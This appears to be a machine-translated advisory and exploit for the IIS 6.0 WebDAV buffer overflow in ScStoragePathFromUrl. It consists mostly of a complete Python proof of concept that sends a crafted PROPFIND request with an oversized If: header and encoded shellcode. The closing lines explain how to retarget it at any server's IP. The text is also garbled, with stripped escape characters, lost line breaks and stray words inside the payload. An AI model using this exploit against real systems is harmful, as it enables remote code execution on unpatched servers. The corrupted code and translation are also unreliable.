Vulnerability Description: Open the IIS 6.0 WebDAV services are blasting the presence of a buffer overflow vulnerability to cause remote code execution, is currently for Windows Server2003 R2 can be stabilized exploit the vulnerability in early 2016, July and August began to be used in the wild.
Vulnerability Type: Buffer overflow
Vulnerability Level: high risk
Impact of product: Microsoft Windows Server 2003 R2 open WebDAV services IIS6.0 (currently authenticated, other versions have not yet verified)
Trigger function: ScStoragePathFromUrl function
Additional information: ScStoragePathFromUrl function is called twice
Details Vulnerability: buffer overflow vulnerability exists in ScStoragePathFromUrl 2003 IIS6.0 function of Windows Server WebDAV service, the attacker by a with "If: <Http: //" PROPFIND beginning of a long header header request to execute arbitrary code.
0X01 use conditions
iis6.0
Open function WebDav (PROPFIND method is particularly successful returns 207 or 200)
#written by Zhiniang Peng and Chen Wu. Information Security Lab & School of Computer Science & Engineering, South China University of Technology Guangzhou, China #-----------Email: [email protected] import socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('127.0.0.1',80)) pay='PROPFIND / HTTP/1.1rnHost: localhostrnContent-Length: 0rn' pay+='If: <http://localhost/aaaaaaa' pay+='xe6xbdxa8xe7xa1xa3xe7x9dxa1xe7x84xb3xe6xa4xb6xe4x9dxb2xe7xa8xb9xe4xadxb7xe4xbdxb0xe7x95x93xe7xa9x8fxe4xa1xa8xe5x99xa3xe6xb5x94xe6xa1x85xe3xa5x93xe5x81xacxe5x95xa7xe6x9dxa3xe3x8dxa4xe4x98xb0xe7xa1x85xe6xa5x92xe5x90xb1xe4xb1x98xe6xa9x91xe7x89x81xe4x88xb1xe7x80xb5xe5xa1x90xe3x99xa4xe6xb1x87xe3x94xb9xe5x91xaaxe5x80xb4xe5x91x83xe7x9dx92xe5x81xa1xe3x88xb2xe6xb5x8bxe6xb0xb4xe3x89x87xe6x89x81xe3x9dx8dxe5x85xa1xe5xa1xa2xe4x9dxb3xe5x89x90xe3x99xb0xe7x95x84xe6xa1xaaxe3x8dxb4xe4xb9x8axe7xa1xabxe4xa5xb6xe4xb9xb3xe4xb1xaaxe5x9dxbaxe6xbdxb1xe5xa1x8axe3x88xb0xe3x9dxaexe4xadx89xe5x89x8dxe4xa1xa3xe6xbdx8cxe7x95x96xe7x95xb5xe6x99xafxe7x99xa8xe4x91x8dxe5x81xb0xe7xa8xb6xe6x89x8bxe6x95x97xe7x95x90xe6xa9xb2xe7xa9xabxe7x9dxa2xe7x99x98xe6x89x88xe6x94xb1xe3x81x94xe6xb1xb9xe5x81x8axe5x91xa2xe5x80xb3xe3x95xb7xe6xa9xb7xe4x85x84xe3x8cxb4xe6x91xb6xe4xb5x86xe5x99x94xe4x9dxacxe6x95x83xe7x98xb2xe7x89xb8xe5x9dxa9xe4x8cxb8xe6x89xb2xe5xa8xb0xe5xa4xb8xe5x91x88xc8x82xc8x82xe1x8bx80xe6xa0x83xe6xb1x84xe5x89x96xe4xacxb7xe6xb1xadxe4xbdx98xe5xa1x9axe7xa5x90xe4xa5xaaxe5xa1x8fxe4xa9x92xe4x85x90xe6x99x8dxe1x8fx80xe6xa0x83xe4xa0xb4xe6x94xb1xe6xbdx83xe6xb9xa6xe7x91x81xe4x8dxacxe1x8fx80xe6xa0x83xe5x8dx83xe6xa9x81xe7x81x92xe3x8cxb0xe5xa1xa6xe4x89x8cxe7x81x8bxe6x8dx86xe5x85xb3xe7xa5x81xe7xa9x90xe4xa9xac' + = Pay '>' Pay + = '(Not <locktoken: WRITE1>) <HTTP: // localhost / BBBBBBB' Pay + = 'xe7xa5x88xe6x85xb5xe4xbdx83xe6xbdxa7xe6xa large column IIS6.0 remote command executiondxafxe4xa1x85xe3x99x86xe6x9dxb5xe4x90xb3xe3xa1xb1xe5x9dxa5xe5xa9xa2xe5x90xb5xe5x99xa1xe6xa5x92xe6xa9x93xe5x85x97xe3xa1x8exe5xa5x88xe6x8dx95xe4xa5xb1xe4x8dxa4xe6x91xb2xe3x91xa8xe4x9dx98xe7x85xb9xe3x8dxabxe6xadx95xe6xb5x88xe5x81x8fxe7xa9x86xe3x91xb1xe6xbdx94xe7x91x83xe5xa5x96xe6xbdxafxe7x8dx81xe3x91x97xe6x85xa8xe7xa9xb2xe3x9dx85xe4xb5x89xe5x9dx8exe5x91x88xe4xb0xb8xe3x99xbaxe3x95xb2xe6x89xa6xe6xb9x83xe4xa1xadxe3x95x88xe6x85xb7xe4xb5x9axe6x85xb4xe4x84xb3xe4x8dxa5xe5x89xb2xe6xb5xa9xe3x99xb1xe4xb9xa4xe6xb8xb9xe6x8dx93xe6xadxa4xe5x85x86xe4xbcxb0xe7xa1xafxe7x89x93xe6x9dx90xe4x95x93xe7xa9xa3xe7x84xb9xe4xbdx93xe4x91x96xe6xbcxb6xe7x8dxb9xe6xa1xb7xe7xa9x96xe6x85x8axe3xa5x85xe3x98xb9xe6xb0xb9xe4x94xb1xe3x91xb2xe5x8dxa5xe5xa1x8axe4x91x8exe7xa9x84xe6xb0xb5xe5xa9x96xe6x89x81xe6xb9xb2xe6x98xb1xe5xa5x99xe5x90xb3xe3x85x82xe5xa1xa5xe5xa5x81xe7x85x90xe3x80xb6xe5x9dxb7xe4x91x97xe5x8dxa1xe1x8fx80xe6xa0x83xe6xb9x8fxe6xa0x80xe6xb9x8fxe6xa0x80xe4x89x87xe7x99xaaxe1x8fx80xe6xa0x83xe4x89x97xe4xbdxb4xe5xa5x87xe5x88xb4xe4xadxa6xe4xadx82xe7x91xa4xe7xa1xafxe6x82x82xe6xa0x81xe5x84xb5xe7x89xbaxe7x91xbaxe4xb5x87xe4x91x99xe5x9dx97xebx84x93xe6xa0x80xe3x85xb6xe6xb9xafxe2x93xa3xe6xa0x81xe1x91xa0xe6xa0x83xccx80xe7xbfxbexefxbfxbfxefxbfxbfxe1x8fx80xe6xa0x83xd1xaexe6xa0x83xe7x85xaexe7x91xb0xe1x90xb4xe6xa0x83xe2xa7xa7xe6xa0x81xe9x8ex91xe6xa0x80xe3xa4xb1xe6x99xaexe4xa5x95xe3x81x92xe5x91xabxe7x99xabxe7x89x8axe7xa5xa1xe1x90x9cxe6xa0x83xe6xb8x85xe6xa0x80xe7x9cxb2xe7xa5xa8xe4xb5xa9xe3x99xacxe4x91xa8xe4xb5xb0xe8x89x86xe6xa0x80xe4xa1xb7xe3x89x93xe1xb6xaaxe6xa0x82xe6xbdxaaxe4x8cxb5xe1x8fxb8xe6xa0x83xe2xa7xa7xe6xa0x81' shellcode='VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB6X6WMV7O7Z8Z8Y8Y2TMTJT1M017Y6Q01010ELSKS0ELS3SJM0K7T0J061K4K6U7W5KJLOLMR5ZNL0ZMV5L5LMX1ZLP0V3L5O5SLZ5Y4PKT4P4O5O4U3YJL7NLU8PMP1QMTMK051P1Q0F6T00NZLL2K5U0O0X6P0NKS0L6P6S8S2O4Q1U1X06013W7M0B2X5O5R2O02LTLPMK7UKL1Y9T1Z7Q0FLW2RKU1P7XKQ3O4S2ULR0DJN5Q4W1O0HMQLO3T1Y9V8V0O1U0C5LKX1Y0R2QMS4U9O2T9TML5K0RMP0E3OJZ2QMSNNKS1Q4L4O5Q9YMP9K9K6SNNLZ1Y8NMLML2Q8Q002U100Z9OKR1M3Y5TJM7OLX8P3ULY7Y0Y7X4YMW5MJULY7R1MKRKQ5W0X0N3U1KLP9O1P1L3W9P5POO0F2SMXJNJMJS8KJNKPA' pay+=shellcode pay+='>rnrn' print pay sock.send(pay) data = sock.recv(80960) print data sock.close
Modify code sock.connect (( '127.0.0.1', 80)), to modify the IP address of the target IP, run the file, the calculator will pop up on the target server.